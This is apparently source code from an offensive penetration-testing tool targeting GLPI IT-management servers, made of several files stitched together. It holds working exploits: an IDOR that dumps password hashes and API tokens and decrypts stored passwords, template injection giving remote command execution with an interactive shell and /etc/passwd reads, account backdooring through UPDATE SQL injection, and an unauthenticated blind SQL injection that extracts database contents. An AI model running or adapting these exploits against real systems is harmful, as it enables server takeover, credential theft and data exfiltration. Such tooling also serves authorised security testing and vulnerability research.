        Recover the idor_token and some other necessary values for exploit
        """
        values = {"_idor_token": ""}
        values["_idor_token"] = self._extract("idor_token", html)

        right = self._extract("right", html)
        if right:
            values["right"] = right

        entity = self._extract("entity", html) # entity_restrict: "[0,1]"
        if entity:
            values["entity_restrict"] = entity

        return values

    @staticmethod
    def _capitalize(value):
        """
        Return the capitalise needed for some classes
        """
        lower_val = value.lower()
        if lower_val == "authldap":
            return "AuthLDAP"
        elif lower_val == 'glpi\\event':
            return "Glpi\\Event"
        elif lower_val == 'authmail':
            return "AuthMail"
        elif lower_val == 'itilfollowup':
            return "ITILFollowup"
        elif lower_val == "itilsolution":
            return "ITILSolution"
        elif lower_val == "usercategory":
            return "UserCategory"
        elif lower_val == "profileright":
            return "ProfileRight"
        elif lower_val == "profile_user":
            return "Profile_User"
        elif lower_val == "tickettask":
            return "TicketTask"
        elif lower_val == "mailcollector":
            return "MailCollector"
        elif lower_val == "apiclient":
            return "APIClient"
        elif lower_val == "dashboard" or lower_val == "glpi\\dashboard\\dashboard":
            return "Glpi\\Dashboard\\Dashboard"
        return value.capitalize()

    @staticmethod
    def get_table_for_itemtype(itemtype):
        """
        Return the table name for an itemtype

        :param itemtype: The itemtype to find the table for
        :type itemtype: str
        """
        if itemtype.lower() == 'glpi\\event':
            return "glpi_events"
        elif itemtype.lower() == "usercategory":
            return "glpi_usercategories"
        elif itemtype.lower() == "glpi\\dashboard\\dashboard":
            return "glpi_dashboards_dashboards"
        elif itemtype.lower() == "pluginformcreatorform":
            return "glpi_plugin_formcreator_forms"
        return f"glpi_{itemtype.lower()}s"

    def _try_decrypt_password(self, results, fields, itemtype):
        """
        Try to decrypt the password from the result

        :param results: The results from html
        :type results: Dict[str, Any]

        :param fields: The fields given as parameters by the user
        :type fields: List[str]

        :param itemtype: The itemtype specified by the user
        :type itemtype: str
        """
        version_used = self.glpi_session.glpi_infos.glpi_version
        if(version_used is None or version.parse(version_used) > version.parse('9.4.6')):
            return

        itemtype = self._capitalize(itemtype)
        encrypted_password_fields = {
                                     "AuthLDAP": ["rootdn_passwd"],
                                     "Config": ["proxy_passwd", "smtp_passwd"]
                                     }

        sensitive_field = encrypted_password_fields.get(itemtype)
        if not sensitive_field:
            return

        print()
        intersect_fields = [value for value in sensitive_field if value in fields]
        if intersect_fields:
            Log.msg(f"Found potentially encrypted field: [i]{','.join(intersect_fields)}[/i]")
            for value in results:
                if("text" in value.keys()):
                    values_splitted = value["text"].split(" - ")
                    for field_to_decrypt in intersect_fields:
                        field_index = fields.index(field_to_decrypt) + 1 # The result add a wolumn usually
                        if field_index < len(values_splitted):
                            unencrypted = GlpiUtils.decrypt_old(values_splitted[field_index])
                            Log.msg(f"Decryption result: '{values_splitted[field_index]}' ==> {unencrypted.decode()}")

        else:
            for value in results:
                if("text" in value.keys()):
                    values_splitted = value["text"].split(" - ")
                    if(len(values_splitted) == 2
                        and values_splitted[0] in sensitive_field):
                        encrypted = values_splitted[1]
                        if encrypted:
                            Log.msg(f"Found potentially encrypted field: [i]{values_splitted[0]}[/i]")
                            unencrypted = GlpiUtils.decrypt_old(encrypted)
                            Log.msg(f"Decryption result: '{encrypted}' ==> {unencrypted.decode()}")

    def run(self,
            itemtype="User",
            fields="id,password,api_token,password_forget_token",
            page_limit="2000",
            page=None):
        """
        Run the exploit on the target
        """
        # Because 'display_dc_position' => true in /ajax/cable.php for version < 10.0.10
        # itemtype is lower then capitalize, this is for staying compatible in older versions
        # In order to work with glpi 9.x.x you must provide the itemtype in lowercase
        displaywith = []
        for field in fields.split(","):
            displaywith.append(field.strip())

        if(itemtype.lower() == "user" or itemtype.lower() == "group"):
            itemtype = itemtype.lower()
            res = self.post("/ajax/dropdownValidator.php", data={"validatortype": itemtype, "right": "all", "entity": -1})

        else:
            itemtype = self._capitalize(itemtype)
            Log.log(f"Itemtype [blue]{itemtype}[/blue] may only be retrieved on version < 10.0.13")
            res = self.post("/ajax/socket.php", data={"itemtype": itemtype, "action": "getItemsFromItemtype", "dom_rand": "", "dom_name": ""})

        add_values = self._get_necessary_values(res.text)

        add_values["itemtype"] = self._capitalize(itemtype) # Important for passing the IDOR check, as the classname is used
        if add_values["itemtype"] in ["Log",
                                      "Glpi\\Event",
                                      "ITILFollowup",
                                      "ITILSolution",
                                      "ProfileRight",
                                      "Profile",
                                      "Profile_User",
                                      "TicketTask"]:
            add_values["order"] = "id"

        add_values["displaywith[]"] = displaywith
        add_values["page"] = 1
        if(page and page.isdigit()):
            add_values["page"] = page
        add_values["page_limit"] = page_limit
        add_values["display_emptychoice"] = 1
        add_values["emptylabel"] = "============"

        exploit_res = self.post("/ajax/getDropdownValue.php", data=add_values)

        try:
            results = exploit_res.json()["results"]
            Log.msg(f"Value recovered for [blue]{itemtype.capitalize()}[/blue]([cyan]{fields}[/cyan]):")
            for value in results:
                if("text" in value.keys()):
                    values_splitted = value["text"].split(" - ")
                    print(";".join(values_splitted))
                
                if("children" in value.keys()):
                    for val in value["children"]:
                        print(val)

            self._try_decrypt_password(results, displaywith, itemtype)

        except Exception as e:
            Log.err(e)
            if 'results' in exploit_res.text:
                Log.log("results might be in http response")
                print(exploit_res.text)



import re
import time
import uuid
from http import HTTPStatus
from packaging import version
from glpwnme.exploits.exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils
from urllib.parse import urlparse, parse_qs, quote_plus
from enum import Enum, auto

class STATE(Enum):
    DEFAULT = 1
    FORM_UUID = 2

class CVE_2026_26026(GlpiExploit):
    """
    This CVE abuse a concatenation to a template string that is rendered using
    user input

      ..sql ::
        select * from glpi_profilerights WHERE name="form";

        +-----+-------------+------+--------+
        | id  | profiles_id | name | rights |
        +-----+-------------+------+--------+
        | 782 |           1 | form |      0 |
        | 783 |           2 | form |      0 |
        | 784 |           3 | form |      0 |
        | 785 |           4 | form |     31 | --> SuperAdmin only can play with 'form'
        | 786 |           5 | form |      0 |
        | 787 |           6 | form |      0 |
        | 788 |           7 | form |      0 |
        | 789 |           8 | form |      0 |
        +-----+-------------+------+--------+


    @author Zax
    @cvss 7.2
    @name CVE_2026_26026
    """
    min_version = "11.0.0"
    max_version = "11.0.6"
    _impacts = "S.S.T.I (Server Side Template Injection)"
    _privilege = "SuperAdmin"

    FORM_NAME = "Orange Cyberdefense malicious form"
    QUESTION_NAME = "How are you ?"
    SENTINEL = "OCDOCDOCDOCDOCD"

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allows any SuperAdmin to achieve [b]Code execution[/b] through SSTI.\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]php_function (default: 'shell_exec')[/i]:\n\tThe php function to execute\n"
        infos += " - [i]args (default 'id')[/i]: Arguments to provide to the function\n"
        infos += " - [i]form_id (optionnal)[/i]: The id of the form to modify (be careful with this param as it changes the remote form)\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Execute another command with shell_exec[/]\n"
        infos += "--run -O args='ls -lhas'\n"

        infos += "\n[grey66]# Read /etc/passwd from server[/]\n"
        infos += "--run -O php_function='readfile' args='/etc/passwd'\n"

        infos += "\n[grey66]# Use an existing form[/]\n"
        infos += "--run -O form_id=5\n"

        infos += "\n[u]Note:[/u]\n"
        infos += "Please note that this exploit will create a form do not forget to remove it\n"

        infos += "\nExploit is [green b]Safe[/]"
        return infos

    @staticmethod
    def extract_uuids(response, form_id):
        """
        Extract uuid for form question and section, not sure this is the right way to do it...
        Anyway, it will only extract the form uuid given its id, and one section with a quesion if any

        If there are multiple questions / sections it will return the first found
        """
        state = STATE.DEFAULT

        soup = BeautifulSoup(response.text, "html.parser")
        hidden_fields = {}

        for inp in soup.find_all("input", {"type": "hidden"}):
            name = inp.get("name", "")
            value = inp.get("value", "")
            if name == "id" and value == form_id:
                # Next uuid is the one of the form
                state = STATE.FORM_UUID
                continue

            if name == "uuid" and state == STATE.FORM_UUID:
                if not hidden_fields.get("form_uuid"):
                    hidden_fields["form_uuid"] = value
                    state = STATE.DEFAULT

            elif(name == "forms_sections_uuid" and value
                 and not hidden_fields.get("question_uuid")):
                hidden_fields["section_uuid"] = value
                question = inp.find_previous("input")
                if question and question.get("name", "") == "uuid":
                    question_uuid = question.get("value", "")
                    if question_uuid:
                        hidden_fields["question_uuid"] = value

            if state != STATE.DEFAULT:
                state = STATE.DEFAULT
        return hidden_fields

    def run(self,
            php_function="shell_exec",
            args="id",
            form_id=None):
        """
        Run the exploit on the target
        """
        if not form_id:
            result = self.get("/front/form/form.form.php")
            if GlpiUtils.is_access_denied(result.text):
                Log.err(f"It seems you are not Super-Admin (Got HTTP / {result.status_code}) ")
                return
            form_id = parse_qs(urlparse(self.glpi_session.current_url).query).get("id", [None])[0]
            if not form_id:
                Log.err("Cannot find a usable form_id, please provide one")
                return
            Log.log(f"Next time rerun with [b]-O form_id={form_id}[/b] to prevent creating unecessary forms")
            self._write_log(f"Created form with id: {form_id}")

        base_payload = '{{ call(_get[0], _get[1]) }}'
        payload = f'{self.__class__.SENTINEL}{base_payload}{self.__class__.SENTINEL}'
        Log.msg(f"Using form n°{form_id}")

        res = self.get(f"/ajax/common.tabs.php?_glpi_tab=Glpi\\Form\\Form$main&_target=/front/form/form.form.php&_itemtype=Glpi\\Form\\Form&id={form_id}&0=chr&1[]=61")
        if res.status_code != HTTPStatus.OK:
            Log.err(f"Error recovering form information, got [dodger_blue1]HTTP {res.status_code}[/dodger_blue1]")
            return

        if self.__class__.SENTINEL not in res.text:
            result = self.__class__.extract_uuids(res, form_id)
            if "form_uuid" not in result.keys():
                Log.err("Form could not be initialized, exiting...")
                return

            for key in ("section_uuid", "question_uuid"):
                if key not in result.keys():
                    key_uuid = str(uuid.uuid4())
                    keyname = key.split("_")[0]
                    Log.log(f"No {keyname} for form n°{form_id}, adding one with custom id: {key_uuid}")
                    result[key] = key_uuid

            update_json = {"name":self.__class__.FORM_NAME,"is_active":"0","header":"","_uploader_header":[{}],
                           "_sections":
                               {"0":
                                   {"name":"First section","description":"","_uploader_description":[{}],
                                    "uuid":result["section_uuid"],"forms_forms_id":form_id,"rank":"0"}
                               },
                           "_questions":
                               {"0":
                                   {"name":self.__class__.QUESTION_NAME,
                                    "description":"","_uploader_description":[{}],"default_value":"0",
                                    "extra_data":{},
                                    "extra_data":
                                        {"options": {"2123963109":payload }},
                                    "_type_category":"Glpi\\Form\\QuestionType\\QuestionTypeCategory->dropdown",
                                    "type":"Glpi\\Form\\QuestionType\\QuestionTypeDropdown",
                                    "is_mandatory":"0",
                                    "uuid":result["question_uuid"],
                                    "forms_sections_uuid":result["section_uuid"],
                                    "vertical_rank":"0",
                                    "horizontal_rank":"-1",
                                    "category":"Glpi\\Form\\QuestionType\\QuestionTypeCategory->dropdown"}
                                },
                            "render_layout":"step_by_step","id":form_id,"uuid":result["form_uuid"],
                            "_delete_missing_questions":"1","_delete_missing_sections":"1","_delete_missing_comments":"1",
                            "is_draft":"0","_action":"update","update":True,"itemtype":"Glpi\\Form\\Form"}


            result = self.post("/GenericAjaxCrud", json=update_json, headers={"Content-Type": "application/json"})

            if result.status_code != HTTPStatus.OK:
                Log.err(f"An unknown error occured...")
                return

        else:
            Log.msg(f"Payload ready")

        Log.log(f"Do not forget to clean ([b]--clean -O form_id={form_id}[/b])")
        Log.msg(f"Executing: {php_function}({args})")
        
        re_result = re.compile(re.escape(self.__class__.SENTINEL) + r'(.*?)' + re.escape(self.__class__.SENTINEL), re.S)
        result = self._exec_command(form_id, php_function, args, re_result, base_payload)
        if not result:
            Log.err(f"No result found, target might be patched")

        else:
            Log.msg(f"Results:")
            print(result)

            if Log.ask("Do you want an interactive shell"):
                command = ""
                while command not in ("exit", "quit"):
                    command = input("(CVE_2026_26026 [exit]) $ ")
                    if not command.strip():
                        continue

                    else:
                        print(self._exec_command(form_id, php_function, command, re_result, base_payload))

    def _exec_command(self, form_id, php_function, command, re_result, base_payload):
        """
        Function that exec the command and return the result
        """
        res = self.get("/ajax/common.tabs.php?_glpi_tab=Glpi\\Form\\Form$main&_target=/front/form/form.form.php"
                       f"&_itemtype=Glpi\\Form\\Form&id={form_id}&0={php_function}&1[]={quote_plus(command)}")
        results = re.findall(re_result, res.text)
        if not results:
            return ""

        command_res = ""
        for cmd_res in set(results):
            if cmd_res != base_payload:
                command_res += cmd_res
        return command_res

    def clean(self, form_id):
        """
        Remove the form with the given id
        """
        delete_json = {"itemtype":"Glpi\\Form\\Form", "id":form_id, "_action": "purge"}
        result = self.post("/GenericAjaxCrud", json=delete_json, headers={"Content-Type": "application/json"})
        if result.status_code == HTTPStatus.OK:
            Log.msg(f"Form n°{form_id} has successfully be cleaned :grin-emoji:")

        else:
            Log.err(f"Got error HTTP - {result.status_code}")



from dataclasses import dataclass
from glpwnme.exploits.logger import Log

@dataclass
class Metadata:
    """
    Class containing the metadatas of an exploit
    """
    author: str = ""
    name: str = ""
    cvss: float = 0
    description: str = ""

    def display(self):
        """
        Display the metadatas of the exploit
        """
        Log.print(f"Exploit Informations:")

        if self.author:
            Log.print(f"Author: [green bold]{self.author}[/green bold]")

        if self.name:
            Log.print(f"Name: [green bold]{self.name}[/green bold]")

        if self.cvss != 0:
            Log.print(f"Score CVSS: [yellow bold]{self.cvss}[/yellow bold]")

        if self.description:
            Log.print(f"[bold]Description:[/bold]")
            Log.print("```")
            print(self.description)
            Log.print("```")

    @classmethod
    def parse_from_comment(cls, comments):
        """
        Parse the metadata from the comments

        :param comments: The doc comment from the class
        :type comments: str

        :return: The metadatas completed
        :rtype: class:Metadata
        """
        metadatas = {}
        comments = map(lambda w: w.strip(), comments.split("\n"))
        for comment in comments:
            index = comment.find("@")
            end = comment.find(" ")
            if(end != -1 and len(comment) > end):
                subkey = comment[index+1: end]
                value = comment[end+1:]
                if subkey.lower() in ["author", "name", "cvss", "description"]:
                    metadatas[subkey.lower()] = value

        if metadatas:
            return cls(**metadatas)
        return None



import time
from typing import final
from abc import abstractmethod

from .exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from glpwnme.exploits.utils import GlpiUtils, LoginResult

class UpdateSqlInjectionMixin(GlpiExploit):
    """
    Class helping for sql injection on update clauses in GLPI

    A lot of methods are final here, it is because I don't want to implement
    those methods in different ways in each class. Still you can update
    some methods here if needed
    """
    field_storage = "phone2"

    def __init__(self, glpi_session, field):
        super().__init__(glpi_session)
        self.field = field
        self.user_id = None

    @property
    def field(self):
        if not self._field:
            raise ValueError("Cannot work with an undefined <field>, "
                             f"override the __init__ method in {self.__class__.__name__}")
        return self._field

    @field.setter
    def field(self, value):
        """
        Set the field vulnerable to sql injection

        :param value: The name of the field
        :type value: str
        """
        if not value:
            raise ValueError("Cannot set the field to an empty value")
        self._field = value

    @abstractmethod
    def _make_payload(self, field, payload, condition):
        """
        Make the sql payload ready to be injected

        :param field: In which field to store the result
        :type field: str

        :param payload: The sql payload to use, Do not use `FROM glpi_users` inside as
          it will break the sql syntax
        :type payload: str

        :param condition: The condition which is mandatory, to not apply an update everywhere
        :type condition: str
        """
        raise NotImplementedError

    @abstractmethod
    def send_payload(self, payload):
        """
        Send the payload

        :param payload: The payload sql to send
        :type payload: str
        """
        raise NotImplementedError

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allow to execute arbitrary query inside an [b]UPDATE[/] statement in the [i]glpi_users[/] table\n"
        infos += "It can be used to backdoor any account, or change db fields.\n"
        infos += "Also you shall be able to recover any db value if you need\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]account_target[/i]: The name of the account on which to update the data through SQL Injection\n"
        infos += " - [i]set_field (optionnal)[/i]: The field to set on the `glpi_users` table\n"
        infos += " - [i]set_val (optionnal)[/i]: The val to set for the associated field\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Backdoor an account named glpi[/]\n"
        infos += "--run -O account_target=glpi\n"

        infos += "\n[grey66]# Change the field name is_active in the db and set it to 1 (re-enable a user)[/]\n"
        infos += "--run -O account_target=glpi set_field=is_active set_val=1\n"
        infos += "\nExploit is [red b]Dangerous[/]"
        return infos

    def log_payload(self, payload):
        """
        Log the SQL payload on screen in order to show what really happens under
        the HOOD !!

        :param payload: The payload used
        :type payload: str
        """
        Log.msg("SQL Payload used:")
        Log.print(f"UPDATE `glpi_users` SET `{self.field}` = '{payload}'")

    def get_user_id(self):
        """
        Return the user_id of the current user

        :raise LookupError: If the user id is not found

        :return: The user_id
        :rtype: str
        """
        if not self.user_id:
            current_user = self.glpi_session.get_username()
            user_id = current_user["id"]
            if not user_id:
                raise LookupError("Cannot find user ID !")
            self.user_id = user_id
        return self.user_id

    def _reset_field(self, field, condition):
        """
        Reset a field to the value NULL. If the field is the injected field
        then reset it already, withotu making the SQL query more complex.
        By default, the field overrided is always reseted to NULL at each SQL injection

        :param field: The name of the field to reset
        :type field: str
        """
        self.send_payload(self._make_payload(field=field, payload="NULL", condition=condition))

    def success_hook(self):
        """
        Usable hook for subclasses if needed

        This hook will be called 3 times:
         - After a successfull check
         - After a successfull exploit
         - After a clean (cannot decide whether or not it worked)
        """
        ...

    @final
    def _recover_api_token(self, username):
        """
        Recover the api token from the user username

        :param username: The target username to exploit
        :type username: str

        :return: The api token of the target if found, else empty string
        :rtype: str
        """
        user_hex = GlpiUtils.to_hex(username)
        api_payload = f'(SELECT api_token from (select * from glpi_users) as temp_table where name={user_hex})'
        payload = self._make_payload(field=self.field_storage,
                                     payload=api_payload,
                                     condition=f"id={self.get_user_id()}")
        self.send_payload(payload)
        res = self.glpi_session.get_user_data()
        api_token = GlpiUtils.extract_user_field(res.text, self.field_storage)
        return api_token

    @final
    def check(self):
        """
        Check if the target is vulnerable
        The payload actually just sleep for 3 seconds and reset the
        field to NULL (default value)
        """
        self.get_user_id()
        payload = self._make_payload(field=self.field,
                                     payload="(SELECT SLEEP(3) UNION SELECT NULL LIMIT 1 OFFSET 1)",
                                     condition="is_active=1 LIMIT 1")
        start_time = time.time()
        self.send_payload(payload)
        if time.time() - start_time > 3.0:
            self._reset_field(field=self.field, condition="is_active=1 LIMIT 1")
            self.success_hook()
            return True
        return False

    @final
    def _backdoor_account(self, account_target, api_key):
        """
        Backdoor account on glpi by setting an api key

        :param account_target: The account to backdoor
        :type account_target: str

        :param api_key: The api_key used
        :type api_key: str
        """
        Log.log(f"Api key generated: [b]{api_key}[/b]")
        Log.log(f"Trying to backdoor account {account_target}")

        current_api_key = self._recover_api_token(account_target)

        if not current_api_key:
            self._write_log(f"Backdooring account '{account_target}' with API Token: '{api_key}'")

            account_hex = GlpiUtils.to_hex(account_target)
            api_key_hex = GlpiUtils.to_hex(api_key)

            payload = self._make_payload(field="api_token",
                                         payload=api_key_hex,
                                         condition=f"name={account_hex}")
            self.log_payload(payload)
            self.send_payload(payload)

            # Calling hook here after exploit, to prevent logout - login op
            self.success_hook()

        else:
            Log.msg(f"Already existing API Token: {current_api_key}")

            # Clean the field used to store the sql injection result
            self.post("/front/preference.php",
                      data={"id": self.get_user_id(),
                            self.field_storage: "",
                            "update": "Save"}
                      )
            api_key = current_api_key

        self.glpi_session.logout()
        if self.glpi_session.login("", "", others={"user_token": api_key}) == LoginResult.SUCCESS:
            Log.msg(f"Backdoor worked, cookie:")
            print("; ".join(self.glpi_session.get_login_cookie()))
        else:
            Log.err(f"Could not login with API Token...")

    @final
    def run(self,
            account_target,
            set_field=None,
            set_val=None):
        """
        Run the exploit on the target, it actually backdoor an account with an api key

        :raises ValueError: When parameters are missing

        :param account_target: The name of the account to backdoor
        :type account_target: str

        :param set_field: The field to set
        :type set_field: str

        :param set_val: The val to set for the given field
        :type set_val: str
        """
        self.get_user_id()
        if(set_field and set_val):
            Log.msg(f"Updating field {set_field}={set_val} on account [blue]{account_target}[/]")
            condition = "name=" + GlpiUtils.to_hex(account_target)
            if not set_val.isdigit():
                # Convert string to mysql hex so no worry about the weird char
                new_value = GlpiUtils.to_hex(set_val)
            else:
                new_value = set_val
            payload = self._make_payload(field=set_field, payload=new_value, condition=condition)
            self.log_payload(payload)
            self.send_payload(payload)

            self.success_hook()
            self._write_log(f"Updated {set_field} -> {set_val} for {account_target}")
            Log.msg("Update shall have been done")

        elif(not(set_field or set_val) and account_target):
            api_key = GlpiUtils.random_str(40)
            self._backdoor_account(account_target, api_key)

        else:
            Log.err("Wrong usage")

    @final
    def clean(self, account_target):
        """
        Clean the exploit, by resetting its api key

        :param account_target: The name of the account to clean
        :type account_target: str
        """
        self.get_user_id()
        account_hex = GlpiUtils.to_hex(account_target)

        payload = self._make_payload(field="api_token",
                                     payload="null",
                                     condition=f"name={account_hex}")

        self.log_payload(payload)
        self.send_payload(payload)
        Log.msg(f"API Key of {account_target} shall have been removed !")
        self.success_hook()
        self._write_log(f"API key of {account_target} unset")



import time
from ..exploit import GlpiExploit
from glpwnme.exploits.sql_injection_mixin import SqlInjectionMixin
from glpwnme.exploits.logger import Log


class CVE_2026_26263(GlpiExploit):
    """
    Unauthenticated time-based blind SQL injection via GLPI Search engine (GLPI >= 11.0.0, < 11.0.6).

    The GLPI Search engine's SQLProvider::getWhereCriteria() builds SQL WHERE
    clauses from user-supplied search criteria. For datetime fields, the code
    processes values matching /^\\s*([<>])(=?)(.+)$/ and produces:

        " $date_computation {$regs[1]}{$regs[2]} '{$regs[3]}'"

    where $regs[3] is the raw user input after the comparison operator. Since
    $regs[3] is embedded in single quotes WITHOUT escaping, injecting a quote
    breaks out and executes arbitrary SQL.

    The Knowbase tab 2 ("Browse") in front/helpdesk.faq.php calls
    Search::show('KnowbaseItem'), the full GLPI search engine, reachable WITHOUT
    authentication when public FAQ is enabled (use_public_faq = 1). An
    authenticated user can reach the same sink when public FAQ is off.

    Attack path (via the KB search tab):
        GET /ajax/common.tabs.php?_glpi_tab=Knowbase$2&_itemtype=Knowbase
            &criteria[0][field]=19            (date_mod, datatype=datetime)
            &criteria[0][searchtype]=morethan
            &criteria[0][value]=2027-09-09' OR (SELECT 1 FROM (SELECT IF(<cond>,SLEEP(N),0))z) AND '1'='1

    The injected condition reaches the datetime WHERE clause unescaped. The
    SLEEP fires roughly TWICE per request (the COUNT query and the data query
    both evaluate the criterion), so the observed delay is about 2 * N.

    Fix in 11.0.6 (commit 9926b748): $regs[3] is passed through $DB::quoteValue()
    which escapes the single quote before embedding it in SQL.

    Workaround: disable anonymous FAQ access (use_public_faq = 0); the fix is
    still required for authenticated users.

    @author Zax
    @cvss 8.1
    @name CVE_2026_26263
    """
    _impacts = "SQL Injection, Database Disclosure"
    _privilege = "Unauthenticated"
    _is_check_opsec_safe = False  # the check makes the server SLEEP via SQLi
    min_version = "11.0.0"
    max_version = "11.0.6"

    _FAQ_URL = "/front/helpdesk.faq.php"
    _SLEEP = 1.5
    _THRESHOLD = _SLEEP * 1.5  # real delay is ~2*sleep, so 1.5*sleep cleanly separates TRUE from FALSE

    def _on_before_check(self):
        """Works unauthenticated when public FAQ is enabled; otherwise log in (the same
        datetime sink is reachable authenticated). login_with_credentials raises if no
        credentials were given, so --check-all surfaces the error instead of hiding it."""
        try:
            r = self.get(self._FAQ_URL, allow_redirects=False)
            anon_ok = r.status_code == 200 and "login" not in r.headers.get("Location", "").lower()
        except Exception:
            anon_ok = False
        if not anon_ok:
            self.glpi_session.login_with_credentials()

    def infos(self):
        infos = "[u]Description:[/u]\n"
        infos += "Unauthenticated time-based blind SQL injection via the GLPI Search engine\n"
        infos += "(GLPI 11.0.0 - 11.0.5). [b]front/helpdesk.faq.php[/b] KB search tab invokes\n"
        infos += "[b]Search::show('KnowbaseItem')[/b]; a [b]datetime[/b] criterion value breaks out of\n"
        infos += "[b]SQLProvider::getWhereCriteria()[/b]'s unescaped [i]'{$regs[3]}'[/i]. SLEEP fires\n"
        infos += "~2x per request (COUNT + data query). Unauthenticated with [b]use_public_faq=1[/b],\n"
        infos += "otherwise reachable as any authenticated user.\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Check (unauthenticated when public FAQ is enabled; makes the server sleep)[/]\n"
        infos += "--check --no-opsec\n\n"
        infos += SqlInjectionMixin.get_help_usage()

        infos += "\nExploit makes the server [yellow b]sleep[/] on check (not opsec safe)."
        return infos

    def _inject(self, condition):
        """Send one timed request; the datetime criterion injects the conditional SLEEP.
        searchtype=morethan reaches the datetime branch; the derived-table SLEEP is
        row-count independent; the trailing AND '1'='1 rebalances the template quote."""
        val = f"2027-09-09' OR (SELECT 1 FROM (SELECT IF({condition},SLEEP({self._SLEEP}),0))z) AND '1'='1"
        t0 = time.time()
        try:
            self.get("/ajax/common.tabs.php", params={
                    "_glpi_tab": "Knowbase$2", "_target": self._FAQ_URL,
                    "_itemtype": "Knowbase", "id": "0", "start": "0",
                    "criteria[0][field]": "19",
                    "criteria[0][searchtype]": "morethan",
                    "criteria[0][value]": val,
                }, headers={"X-Requested-With": "XMLHttpRequest"},
                allow_redirects=False, timeout=self._SLEEP * 4 + 15)
        except Exception:
            pass
        return time.time() - t0

    def _probe(self, condition):
        return self._inject(condition) >= self._THRESHOLD

    def check(self):
        # bool only, no CLI output: TRUE condition must delay, FALSE must not
        if self._inject("1=1") < self._THRESHOLD:
            return False
        return self._inject("1=2") < self._THRESHOLD

    def _dichotomy(self, tpl, lo, hi):
        while lo <= hi:
            mid = (lo + hi) // 2
            Log.log(f"Trying: {hex(mid)}", end="\r")
            if self._probe(tpl.format(n=mid)):
                lo = mid + 1
            else:
                hi = mid - 1
        return lo

    def _count_chars(self, sql_expr):
        try_len, prev_len = 20, 0
        for i in range(11):
            if self._probe(f"LENGTH(({sql_expr}))>{try_len}"):
                prev_len = try_len
                try_len *= 2
            elif i == 10:
                return 0
            else:
                break
        return self._dichotomy(f"LENGTH(({sql_expr}))>{{n}}", prev_len, try_len)

    def _extract_char(self, sql_expr, pos):
        return chr(self._dichotomy(f"ASCII(SUBSTR(({sql_expr}),{pos},1))>{{n}}", 0, 127))

    def run(self, sql="SELECT VERSION()", time="1.5"):
        self._SLEEP = float(time)
        self._THRESHOLD = self._SLEEP * 1.5

        Log.msg(f"Extracting: [italic]{sql}[/italic]")
        length = self._count_chars(sql)
        if not length:
            Log.err("Result is empty or query failed - is public FAQ enabled / are creds valid?")
            return

        out = ""
        for i in range(1, length + 1):
            out += self._extract_char(sql, i)
            Log.msg(f"Progress: [gold3]{out}[/]", end="\x1b[K\n")
        Log.msg(f"Result: [green b]{out}[/green b]")




class ExploitNotOpsecException(Exception):
    """Exception raised when an exploit is not opsec safe for check"""

class BadCredentialsException(Exception):
    """Exception raised when the credentials are not valid"""

class MissingMFAException(Exception):
    """Exception when MFA is needed but not provided"""
